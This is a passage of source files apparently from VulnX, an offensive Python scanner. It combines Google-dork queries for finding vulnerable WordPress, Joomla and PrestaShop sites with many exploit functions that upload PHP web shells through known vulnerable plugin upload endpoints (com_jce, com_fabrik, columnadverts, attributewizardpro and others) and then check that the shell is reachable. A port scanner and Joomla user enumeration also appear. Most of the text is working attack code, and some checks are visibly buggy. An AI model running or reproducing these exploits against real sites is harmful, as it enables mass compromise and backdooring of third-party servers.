'videostab' : 'inurl":/modules/videostab/"', 75 | 'wg24themeadministration': 'inurl":/modules//wg24themeadministration/"', 76 | 'fieldvmegamenu' : 'inurl":/modules/fieldvmegamenu/"', 77 | 'wdoptionpanel' : 'inurl":/modules/wdoptionpanel/"', 78 | 'pk_flexmenu' : 'inurl":/modules/pk_flexmenu/"', 79 | 'pk_vertflexmenu' : 'inurl":/modules/pk_vertflexmenu/"', 80 | 'nvn_export_orders' : 'inurl":/modules/nvn_export_orders/"', 81 | 'tdpsthemeoptionpanel' : 'inurl":/modules/tdpsthemeoptionpanel/"', 82 | 'masseditproduct' : 'inurl":/modules/lib/redactor/"', 83 | } 84 | 85 | class Dorks: 86 | 87 | @staticmethod 88 | def getdorksbyname(exploitname): 89 | if exploitname in wp_contentdorks: 90 | return wp_contentdorks[exploitname] 91 | elif exploitname in wp_admindorks: 92 | return wp_admindorks[exploitname] 93 | elif exploitname in wpajx: 94 | return 
wpajx[exploitname] 95 | elif exploitname in wpindex: 96 | return wpindex[exploitname] 97 | elif exploitname in joomla: 98 | return joomla[exploitname] 99 | elif exploitname in prestashop: 100 | return prestashop[exploitname] 101 | 102 | @staticmethod 103 | def searchengine(exploitname,headers,output_dir,numberpage): 104 | try : 105 | print (' %s Searching for %s dork url' %(run,exploitname)) 106 | numberpage = numberpage*10 107 | for np in range(0,numberpage,10): 108 | starty = time.time() 109 | if np==0: 110 | time.sleep(random.randint(1,2)) 111 | print(' %s Page n° 1 ' % (info)) 112 | googlequery = 'https://www.google.com/search?q='+Dorks.getdorksbyname(exploitname) 113 | print(' %s searching for : %s'% (que,googlequery)) 114 | res = requests.get(googlequery,headers).text 115 | if (re.findall(re.compile(r'CAPTCHA'),res)): 116 | print(' %s Bot Detected The block will expire shortly' % bad) 117 | else: 118 | Dorks.WP_dorksconditions(exploitname,res,output_dir) 119 | print ('------------------------------------------------') 120 | else: 121 | time.sleep(random.randint(3,5)) 122 | print(' %s Page n° %i ' % (info,np/10+1)) 123 | googlequery = 'https://www.google.com/search?q='+Dorks.getdorksbyname(exploitname)+'&start='+str(np) 124 | res = requests.get(googlequery,headers).text 125 | print(' %s searching for : %s'% (que,googlequery)) 126 | if (re.findall(re.compile(r'CAPTCHA'),res)): 127 | print(' %s Bot Detected The block will expire shortly' % bad) 128 | else: 129 | Dorks.WP_dorksconditions(exploitname,res,output_dir) 130 | print ('------------------------------------------------') 131 | endy = time.time() 132 | elapsed = endy - starty 133 | print (' %s Elapsed Time : %.2f seconds' % (info,elapsed)) 134 | print("%s----------------%s"%(bannerblue,end)) 135 | export.close() 136 | except Exception as msg: 137 | print(' %s exploitname %s ' %(bad,msg)) 138 | np=+10 139 | 140 | @staticmethod 141 | def WP_dorksconditions(exploitname,response,output_dir): 142 | webs = [] 
143 | if exploitname in wp_contentdorks: 144 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-content/plugins/\w+'),response) 145 | if len(dorks) > 0: 146 | for web in dorks: 147 | if web not in webs: 148 | webs.append(web) 149 | for i in range(len(webs)): 150 | domains = parsify(webs[i]) 151 | print (' %s URL : %s ' %(good , webs[i])) 152 | print (' %s DOMAIN: %s ' %(good , domains)) 153 | export.write(domains) 154 | export.write('\n') 155 | elif exploitname in wp_admindorks: 156 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-admin/\w+'),response) 157 | if len(dorks) > 0: 158 | for web in dorks: 159 | if web not in webs: 160 | webs.append(web) 161 | for i in range(len(webs)): 162 | domains = parsify(webs[i]) 163 | print (' %s URL : %s ' %(good , webs[i])) 164 | print (' %s DOMAIN: %s ' %(good , domains)) 165 | export.write(domains) 166 | export.write('\n') 167 | elif exploitname in wpajx: 168 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/jm-ajax/upload_file/'),response) 169 | if len(dorks) > 0: 170 | for web in dorks: 171 | if web not in webs: 172 | webs.append(web) 173 | for i in range(len(webs)): 174 | domains = parsify(webs[i]) 175 | print (' %s URL : %s ' %(good , webs[i])) 176 | print (' %s DOMAIN: %s ' %(good , domains)) 177 | export.write(domains) 178 | export.write('\n') 179 | elif exploitname in wpindex: 180 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php/wp-json/wp/'),response) 181 | if len(dorks) > 0: 182 | for web in dorks: 183 | if web not in webs: 184 | webs.append(web) 185 | for i in range(len(webs)): 186 | domains = parsify(webs[i]) 187 | print (' %s URL : %s ' %(good , webs[i])) 188 | print (' %s DOMAIN: %s ' %(good , domains)) 189 | export.write(domains) 190 | export.write('\n') 191 | elif exploitname in joomla: 192 | dorks = 
re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php?option=com_jce'),response) 193 | if len(dorks) > 0: 194 | for web in dorks: 195 | if web not in webs: 196 | webs.append(web) 197 | for i in range(len(webs)): 198 | domains = parsify(webs[i]) 199 | print (' %s URL : %s ' %(good , webs[i])) 200 | print (' %s DOMAIN: %s ' %(good , domains)) 201 | export.write(domains) 202 | export.write('\n') 203 | elif exploitname in prestashop: 204 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/modules/\w+'),response) 205 | if len(dorks) > 0: 206 | for web in dorks: 207 | if web not in webs: 208 | webs.append(web) 209 | for i in range(len(webs)): 210 | domains = parsify(webs[i]) 211 | print (' %s URL : %s ' %(good , webs[i])) 212 | print (' %s DOMAIN: %s ' %(good , domains)) 213 | export.write(domains) 214 | export.write('\n') 215 | 216 | class DorkList(): 217 | 218 | @staticmethod 219 | def dorkslist(): 220 | print(""" 221 | %sWordPress Joomla Prestashop 222 | --------- ------ -----------%s 223 | blaze comjce columnadverts 224 | catpro comfabrik soopabanners 225 | cherry comjdownloads vtslide 226 | dm comfoxcontact simpleslideshow 227 | fromcraft productpageadverts 228 | synoptic productpageadvertsb 229 | shop jro_homepageadvertise 230 | revslider attributewizardpro 231 | adsmanager oneattributewizardpro 232 | inboundiomarketing attributewizardpro_old 233 | wysija attributewizardpro_x 234 | powerzoomer advancedslider 235 | showbiz cartabandonmentpro 236 | jobmanager cartabandonmentpro_old 237 | injection videostab 238 | thumbslider wg24themeadministration 239 | fieldvmegamenu 240 | wdoptionpanel 241 | pk_flexmenu 242 | pk_vertflexmenu 243 | nvn_export_orders 244 | tdpsthemeoptionpanel 245 | masseditproduct 246 | """%(W,end)) 247 | 248 | 249 | 250 | @staticmethod 251 | def wp_dorkTable(): 252 | print(""" 253 | WordPress 254 | --------- 255 | blaze 256 | catpro 257 | cherry 258 | dm 259 | fromcraft 260 
| synoptic 261 | shop 262 | revslider 263 | adsmanager 264 | inboundiomarketing 265 | wysija 266 | powerzoomer 267 | showbiz 268 | jobmanager 269 | injection 270 | thumbslider 271 | """) 272 | 273 | @staticmethod 274 | def joo_dorkTable(): 275 | print(""" 276 | Joomla 277 | ------ 278 | comjce 279 | comfabrik 280 | comjdownloads 281 | comfoxcontact 282 | """) 283 | 284 | @staticmethod 285 | def ps_dorkTable(): 286 | 287 | print(""" 288 | Prestashop 289 | ----------- 290 | columnadverts 291 | soopabanners 292 | vtslide 293 | simpleslideshow 294 | productpageadverts 295 | productpageadvertsb 296 | jro_homepageadvertise 297 | attributewizardpro 298 | oneattributewizardpro 299 | attributewizardpro_old 300 | attributewizardpro_x 301 | advancedslider 302 | cartabandonmentpro 303 | cartabandonmentpro_old 304 | videostab 305 | wg24themeadministration 306 | fieldvmegamenu 307 | wdoptionpanel 308 | pk_flexmenu 309 | pk_vertflexmenu 310 | nvn_export_orders 311 | tdpsthemeoptionpanel 312 | masseditproduct 313 | """) 314 | 315 | @staticmethod 316 | def loko_dorkTable(): 317 | print(""" 318 | Lokomedia 319 | ------ 320 | """) 321 | 322 | @staticmethod 323 | def dru_dorkTable(): 324 | print(""" 325 | Drupal 326 | ------ 327 | """) -------------------------------------------------------------------------------- /modules/druExploits.py: -------------------------------------------------------------------------------- 1 | import re 2 | import random 3 | import datetime 4 | import requests 5 | from common.uriParser import parsing_url as hostd 6 | now = datetime.datetime.now() 7 | year = now.strftime('%Y') 8 | month= now.strftime('%m') 9 | 10 | import os 11 | Session = requests.Session() 12 | 13 | from common.colors import failexploit , vulnexploit , que , info , good 14 | from common.requestUp import sendrequest as vxpost 15 | from common.requestUp import getrequest as vxget 16 | -------------------------------------------------------------------------------- /modules/jooExploits.py: 
-------------------------------------------------------------------------------- 1 | import re 2 | import random 3 | import datetime 4 | import requests 5 | now = datetime.datetime.now() 6 | year = now.strftime('%Y') 7 | month= now.strftime('%m') 8 | 9 | import os 10 | Session = requests.Session() 11 | 12 | from common.colors import failexploit , vulnexploit , que , info , good 13 | 14 | def com_jce(url,headers): 15 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 16 | endpoint = url+"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20" 17 | data = { 18 | 'upload-dir':'./../../', 19 | 'upload-overwrite':0, 20 | 'Filedata' : [open('shell/VulnX.gif','rb')], 21 | 'action':'Upload', 22 | } 23 | content = Session.post(endpoint,data,headers) 24 | path_shell = url + "/VulnX.gif" 25 | res=requests.get(path_shell, headers).text 26 | matches = re.findall(re.compile(r'/image/gif/'),res) 27 | if matches: 28 | print (' %s com_jce %s %s' %(que,vulnexploit,path_shell)) 29 | else: 30 | print (' %s com_jce %s' %(que , failexploit)) 31 | 32 | def com_media(url,headers): 33 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 34 | endpoint = url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" 35 | headers={"content-type":["form-data"]} 36 | fieldname = 'Filedata[]' 37 | shell = open('shell/VulnX.txt','rb') 38 | data = { 39 | fieldname:shell, 40 | } 41 | content = Session.post(endpoint,data,headers) 42 | path_shell = endpoint+"/images/XAttacker.txt" 43 | response = requests.get(path_shell,headers).text 44 | if re.findall(r'Tig', response): 45 | print (' %s com_media %s %s' %(que,vulnexploit,path_shell)) 46 | else: 47 | print (' %s com_media %s' %(que , failexploit)) 48 | 49 | 50 | #def com_jdownloads(url,headers): 51 | # endpoint = 
url+"index.php?option=com_jdownloads&Itemid=0&view=upload" 52 | # files = open('shell/VulnX.zip','rb') 53 | # shell = open('shell/VulnX.gif','rb') 54 | # data = { 55 | # 'name' : 'Tig', 56 | # 'mail' :'tig@tig.com', 57 | # 'filetitle' :'Tig', 58 | # 'catlist':'1', 59 | # 'license':'0', 60 | # 'language':'0', 61 | # 'system':'0', 62 | # 'file_upload': files, 63 | # 'pic_upload':shell, 64 | # 'description':'

zot

', 65 | # 'senden':'Send file', 66 | # 'option':'com_jdownloads', 67 | # 'view':'upload', 68 | # 'send':'1', 69 | # '24c22896d6fe6977b731543b3e44c22f':'1', 70 | # } 71 | # upload_file = Session.post(endpoint,data) 72 | # path_shell = endpoint+"/images/jdownloads/screenshots/VulnX.gif?Vuln=X" 73 | # response = requests.get(path_shell).text 74 | # if re.findall(r'Vuln X', response): 75 | # print (' %s com_jdownloads %s %s' %(que,vulnexploit,path_shell)) 76 | # else: 77 | # print (' %s com_jdownloads %s' %(que , failexploit)) 78 | 79 | #def com_jdownloadsb(url,headers): 80 | # headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 81 | # endpoint = url+"/images/jdownloads/screenshots/VulnX.php" 82 | # headers={"content-type":["form-data"]} 83 | # files = open('shell/VulnX.zip','rb') 84 | # shell = open('shell/VulnX.gif','rb') 85 | # data = { 86 | # 'name' : 'Tig', 87 | # 'mail' :'tig@tig.com', 88 | # 'filetitle' :'Tig', 89 | # 'catlist':'1', 90 | # 'license':'0', 91 | # 'language':'0', 92 | # 'system':'0', 93 | # 'file_upload': files, 94 | # 'pic_upload':shell, 95 | # 'description':'

zot

', 96 | # 'senden':'Send file', 97 | # 'option':'com_jdownloads', 98 | # 'view':'upload', 99 | # 'send':'1', 100 | # '24c22896d6fe6977b731543b3e44c22f':'1' 101 | # } 102 | # response = requests.get(endpoint,headers).text 103 | # if re.findall(r'200', response): 104 | # print (' %s com_jdownloads2 %s %s' %(que,vulnexploit,endpoint)) 105 | # else: 106 | # print (' %s com_jdownloads2 %s' %(que , failexploit)) 107 | 108 | def com_fabrika(url,headers): 109 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 110 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 111 | 112 | headers={"content-type":["form-data"]} 113 | fieldname = 'file' 114 | shell = open('shell/VulnX.php','rb') 115 | data = { 116 | fieldname:shell, 117 | } 118 | content = Session.post(endpoint,data,headers) 119 | path_shell = endpoint+"/images/XAttacker.txt" 120 | response = requests.get(path_shell,headers).text 121 | if re.findall(r'Vuln X', response): 122 | print (' %s com_fabrik1 %s %s' %(que,vulnexploit,path_shell)) 123 | else: 124 | print (' %s com_fabrik1 %s' %(que , failexploit)) 125 | 126 | def com_fabrikb(url,headers): 127 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 128 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 129 | 130 | headers={"content-type":["form-data"]} 131 | fieldname = 'file' 132 | shell = open('shell/VulnX.txt','rb') 133 | data = { 134 | fieldname:shell, 135 | } 136 | content = Session.post(endpoint,data,headers) 137 | path_shell = endpoint+"/images/XAttacker.txt" 138 | response = requests.get(path_shell,headers).text 139 | if re.findall(r'Tig', response): 140 | print (' %s com_fabrik2 %s %s' %(que,vulnexploit,path_shell)) 141 | else: 142 | print (' %s com_fabrik2 %s' %(que , failexploit)) 143 | 144 | def com_foxcontact(url,headers): 145 | 
headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 146 | # foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php', 147 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php', 148 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php', 149 | # 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'} 150 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 151 | 152 | headers={"content-type":["form-data"]} 153 | fieldname = 'file' 154 | shell = open('shell/VulnX.txt','rb') 155 | data = { 156 | fieldname:shell, 157 | } 158 | content = Session.post(endpoint,data,headers) 159 | path_shell = endpoint+"/images/XAttacker.txt" 160 | response = requests.get(path_shell,headers).text 161 | if re.findall(r'Tig', response): 162 | print (' %s com_foxcontact %s %s' %(que,vulnexploit,path_shell)) 163 | else: 164 | print (' %s com_foxcontact %s' %(que , failexploit)) 165 | 166 | def com_adsmanager(url,headers): 167 | endpoint = url + "/index.php?option=com_adsmanager&task=upload&tmpl=component" 168 | img = open('shell/VulnX.php', 'rb') 169 | name_img= os.path.basename('shell/VulnX.html') 170 | files= {'image': (name_img,img,'form-data',{'Expires': '0'}) } 171 | upload_file = Session.post(endpoint,files=files) 172 | shellup = url + "/tmp/plupload/VulnX.html" 173 | checkShell = requests.get(shellup).text 174 | statusCheck = re.findall(re.compile(r'VulnX'),checkShell) 175 | if statusCheck: 176 | print(' %s com_adsmanager %s %s' %(que,vulnexploit,shellup)) 177 | else: 178 | print(' %s com_adsmanager %s' %(que , failexploit)) 179 | 180 | def com_blog(url,headers): 181 | endpoint = url + "/index.php?option=com_myblog&task=ajaxupload" 182 | checkShell = 
requests.get(endpoint).text 183 | statusCheck = re.findall(re.compile(r'has been uploaded'),endpoint) 184 | if statusCheck: 185 | print(' %s com_blog %s %s' %(que,vulnexploit,endpoint)) 186 | else: 187 | print(' %s com_blog %s' %(que , failexploit)) 188 | 189 | def com_users(url,headers): 190 | endpoint = url + "/index.php?option=com_users&view=registration" 191 | checkShell = requests.get(endpoint).text 192 | statusCheck = re.findall(re.compile(r'jform_email2-lbl'),endpoint) 193 | if statusCheck: 194 | print(' %s com_users %s %s' %(que,vulnexploit,endpoint)) 195 | else: 196 | print(' %s com_users %s' %(que , failexploit)) 197 | 198 | def comweblinks(url,headers): 199 | endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=" 200 | token = re.findall(re.compile(r'
(.+?)' 10 | pattern = re.compile(regex) 11 | version = re.findall(pattern, response) 12 | if version: 13 | return print (' %s Version : %s' %(good,version[0])) 14 | 15 | def joo_user(url,headers): 16 | users = [] 17 | endpoint = url + '/?format=feed' 18 | response = requests.get(endpoint,headers).text 19 | regex = r'(.+?) \((.+?)\)' 20 | pattern = re.compile(regex) 21 | joouser = re.findall(pattern, response) 22 | if joouser: 23 | joouser = sorted(set(joouser)) 24 | for user in joouser: 25 | users.append(user[1]) 26 | msg = user[1] + ": " + user[0] 27 | print(msg) 28 | 29 | def joo_template(url,headers): 30 | main_endpoint = url + '/index.php' 31 | responsea = requests.get(main_endpoint,headers).text 32 | WebTemplates = re.findall("/templates/(.+?)/", responsea) 33 | WebTemplates = sorted(set(WebTemplates)) 34 | adm_endpoint = url + '/administrator/index.php' 35 | responseb = requests.get(adm_endpoint,headers).text 36 | AdminTemplates = re.findall("/administrator/templates/(.+?)/", responseb) 37 | AdminTemplates = sorted(set(AdminTemplates)) 38 | if WebTemplates: 39 | for WebTemplate in WebTemplates: 40 | return print (' %s WebTemplate : %s' %(good,WebTemplate[0])) 41 | if AdminTemplates: 42 | for AdminTemplate in AdminTemplates: 43 | return print (' %s AdminTemplate : %s' %(good,AdminTemplate[0])) -------------------------------------------------------------------------------- /modules/portChecker.py: -------------------------------------------------------------------------------- 1 | 2 | from common.colors import que,portopen,portclose 3 | import socket 4 | portsobject = { 5 | 21 :'FTP' , 6 | 22 :'SSH' , 7 | 23 :'Telnet' , 8 | 25 :'SMTP' , 9 | 43 :'Whois' , 10 | 53 :'DNS' , 11 | 68 :'DHCP' , 12 | 80 :'HTTP' , 13 | 110 :'POP3' , 14 | 115 :'SFTP' , 15 | 119 :'NNTP' , 16 | 123 :'NTP' , 17 | 139 :'NetBIOS' , 18 | 143 :'IMAP' , 19 | 161 :'SNMP' , 20 | 220 :'IMAP3' , 21 | 389 :'LDAP' , 22 | 443 :'SSL' , 23 | 1521 :'Oracle SQL' , 24 | 2049 :'NFS' , 25 | 3306 :'mySQL' , 
26 | 5800 :'VNC' , 27 | 8080 :'HTTP' , 28 | } 29 | def portscan(host,port): 30 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 | if port: 32 | result = sock.connect_ex((host, port)) 33 | if result == 0: 34 | print (' %s %s %s %s' %(que,port,portopen,portsobject[port])) 35 | else: 36 | print (' %s %s %s %s' %(que,port,portclose,portsobject[port])) 37 | 38 | -------------------------------------------------------------------------------- /modules/prestaExploits.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import os 4 | Session = requests.Session() 5 | from common.colors import que,vulnexploit,que,failexploit 6 | 7 | #columnadvert 8 | def columnadverts(url,headers): 9 | endpoint = url + "/modules/columnadverts/uploadimage.php" 10 | img = open('shell/VulnX.php', 'rb') 11 | name_img= os.path.basename('shell/VulnX.php') 12 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 13 | upload_file = Session.post(endpoint,files=files) 14 | shellup = url + "/modules/columnadverts/slides/VulnX.php?Vuln=X" 15 | checkShell = requests.get(shellup).text 16 | statusCheck = re.findall(re.compile(r'Vuln X'),upload_file) 17 | if statusCheck: 18 | print(' %s column-advert %s %s' %(que,vulnexploit,shellup)) 19 | else: 20 | print(' %s column-advert %s' %(que , failexploit)) 21 | 22 | #soopabanner 23 | def soopabanners(url,headers): 24 | endpoint = url + "/modules/soopabanners/uploadimage.php" 25 | img = open('shell/VulnX.php', 'rb') 26 | name_img= os.path.basename('shell/VulnX.php') 27 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 28 | upload_file = Session.post(endpoint,files=files) 29 | shellup = url + "/modules/soopabanners/slides/VulnX.php?Vuln=X" 30 | checkShell = requests.get(shellup).text 31 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 32 | if statusCheck: 33 | print(' %s soopa-banner %s %s' %(que,vulnexploit,shellup)) 34 | 
else: 35 | print(' %s soopa-banner %s' %(que , failexploit)) 36 | 37 | #vtermslideshow 38 | def vtslide(url,headers): 39 | endpoint = url + "/modules/vtermslideshow/uploadimage.php" 40 | img = open('shell/VulnX.php', 'rb') 41 | name_img= os.path.basename('shell/VulnX.php') 42 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 43 | upload_file = Session.post(endpoint,files=files) 44 | shellup = url + "/modules/vtermslideshow/slides/VulnX.php?Vuln=X" 45 | checkShell = requests.get(shellup).text 46 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 47 | if statusCheck: 48 | print(' %s vterm-slideshowbar %s %s' %(que,vulnexploit,shellup)) 49 | else: 50 | print(' %s vterm-slideshowbar %s' %(que , failexploit)) 51 | 52 | #simpleslideshow 53 | def simpleslideshow(url,headers): 54 | endpoint = url + "/modules/simpleslideshow/uploadimage.php" 55 | img = open('shell/VulnX.php', 'rb') 56 | name_img= os.path.basename('shell/VulnX.php') 57 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 58 | upload_file = Session.post(endpoint,files=files) 59 | shellup = url + "/modules/simpleslideshow/slides/VulnX.php?Vuln=X" 60 | checkShell = requests.get(shellup).text 61 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 62 | if statusCheck: 63 | print(' %s simple-slideshow %s %s' %(que,vulnexploit,shellup)) 64 | else: 65 | print(' %s simple-slideshow %s' %(que , failexploit)) 66 | 67 | #productpageadverts 68 | def productpageadverts(url,headers): 69 | endpoint = url + "/modules/productpageadverts/uploadimage.php" 70 | img = open('shell/VulnX.php', 'rb') 71 | name_img= os.path.basename('shell/VulnX.php') 72 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 73 | upload_file = Session.post(endpoint,files=files) 74 | shellup = url + "/modules/productpageadverts/slides/VulnX.php?Vuln=X" 75 | checkShell = requests.get(shellup).text 76 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 77 | if 
statusCheck: 78 | print(' %s pageadvertise %s %s' %(que,vulnexploit,shellup)) 79 | else: 80 | print(' %s pageadvertise %s' %(que , failexploit)) 81 | 82 | #productpageadvertsb 83 | def productpageadvertsb(url,headers): 84 | endpoint = url + "/modules/homepageadvertise2/uploadimage.php" 85 | img = open('shell/VulnX.php', 'rb') 86 | name_img= os.path.basename('shell/VulnX.php') 87 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 88 | upload_file = Session.post(endpoint,files=files) 89 | shellup = url + "/modules/homepageadvertise2/slides/VulnX.php?Vuln=X" 90 | checkShell = requests.get(shellup).text 91 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 92 | if statusCheck: 93 | print(' %s pageadvertise2 %s %s' %(que,vulnexploit,shellup)) 94 | else: 95 | print(' %s pageadvertise2 %s' %(que , failexploit)) 96 | 97 | #jro_homepageadvertise 98 | def jro_homepageadvertise(url,headers): 99 | endpoint = url + "/modules/jro_homepageadvertise/uploadimage.php" 100 | img = open('shell/VulnX.php', 'rb') 101 | name_img= os.path.basename('shell/VulnX.php') 102 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 103 | upload_file = Session.post(endpoint,files=files) 104 | shellup = url + "/modules/jro_homepageadvertise/slides/VulnX.php?Vuln=X" 105 | checkShell = requests.get(shellup).text 106 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 107 | if statusCheck: 108 | print(' %s jro_homepageadvertise %s %s' %(que,vulnexploit,shellup)) 109 | else: 110 | print(' %s jro_homepageadvertise %s' %(que , failexploit)) 111 | 112 | #attributewizardpro 113 | def attributewizardpro(url,headers): 114 | endpoint = url + "/modules/attributewizardpro/file_upload.php" 115 | img = open('shell/VulnX.php', 'rb') 116 | name_img= os.path.basename('shell/VulnX.php') 117 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 118 | upload_file = Session.post(endpoint,files=files) 119 | shellup = url + 
"/modules/attributewizardpro/file_uploads/VulnX.php?Vuln=X" 120 | checkShell = requests.get(shellup).text 121 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 122 | if statusCheck: 123 | print(' %s attribute-wizardpro %s %s' %(que,vulnexploit,shellup)) 124 | else: 125 | print(' %s attribute-wizardpro %s' %(que , failexploit)) 126 | 127 | #-------------attributewizardpro 128 | def oneattributewizardpro(url,headers): 129 | endpoint = url + "/modules/1attributewizardpro/file_upload.php" 130 | img = open('shell/VulnX.php', 'rb') 131 | name_img= os.path.basename('shell/VulnX.php') 132 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 133 | upload_file = Session.post(endpoint,files=files) 134 | shellup = url + "/modules/1attributewizardpro/file_uploads/VulnX.php?Vuln=X" 135 | checkShell = requests.get(shellup).text 136 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 137 | if statusCheck: 138 | print(' %s oneattributewizardpro %s %s' %(que,vulnexploit,shellup)) 139 | else: 140 | print(' %s oneattributewizardpro %s' %(que , failexploit)) 141 | 142 | 143 | #attributewizardproOLD 144 | def attributewizardpro_old(url,headers): 145 | endpoint = url + "/modules/attributewizardpro.OLD/file_upload.php" 146 | img = open('shell/VulnX.php', 'rb') 147 | name_img= os.path.basename('shell/VulnX.php') 148 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 149 | upload_file = Session.post(endpoint,files=files) 150 | shellup = url + "/modules/attributewizardpro.OLD/file_uploads/VulnX.php?Vuln=X" 151 | checkShell = requests.get(shellup).text 152 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 153 | if statusCheck: 154 | print(' %s attributewizardpro_old%s %s' %(que,vulnexploit,shellup)) 155 | else: 156 | print(' %s attributewizardpro_old%s' %(que , failexploit)) 157 | 158 | #attributewizardproold 159 | def attributewizardpro_x(url,headers): 160 | endpoint = url + 
"/modules/attributewizardpro_x/file_upload.php" 161 | img = open('shell/VulnX.php', 'rb') 162 | name_img= os.path.basename('shell/VulnX.php') 163 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 164 | upload_file = Session.post(endpoint,files=files) 165 | shellup = url + "/modules/attributewizardpro_x/file_uploads/VulnX.php?Vuln=X" 166 | checkShell = requests.get(shellup).text 167 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 168 | if statusCheck: 169 | print(' %s attributewizardpro %s %s' %(que,vulnexploit,shellup)) 170 | else: 171 | print(' %s attributewizardpro %s' %(que , failexploit)) 172 | 173 | #advancedslider 174 | def advancedslider(url,headers): 175 | endpoint = url + "/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php" 176 | img = open('shell/VulnX.php.png', 'rb') 177 | name_img= os.path.basename('shell/VulnX.php.png') 178 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 179 | upload_file = Session.post(endpoint,files=files) 180 | shellup = url + "/modules/advancedslider/uploads/VulnX.php.png?Vuln=X" 181 | checkShell = requests.get(shellup).text 182 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 183 | if statusCheck: 184 | print(' %s advancedslider %s %s' %(que,vulnexploit,shellup)) 185 | else: 186 | print(' %s advancedslider %s' %(que , failexploit)) 187 | 188 | 189 | #cartabandonmentpro 190 | def cartabandonmentpro(url,headers): 191 | endpoint = url + "/modules/cartabandonmentpro/upload.php" 192 | img = open('shell/VulnX.php.png', 'rb') 193 | name_img= os.path.basename('shell/VulnX.php.png') 194 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 195 | upload_file = Session.post(endpoint,files=files) 196 | shellup = url + "/modules/cartabandonmentpro/uploads/VulnX.php.png?Vuln=X" 197 | checkShell = requests.get(shellup).text 198 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 199 | if 
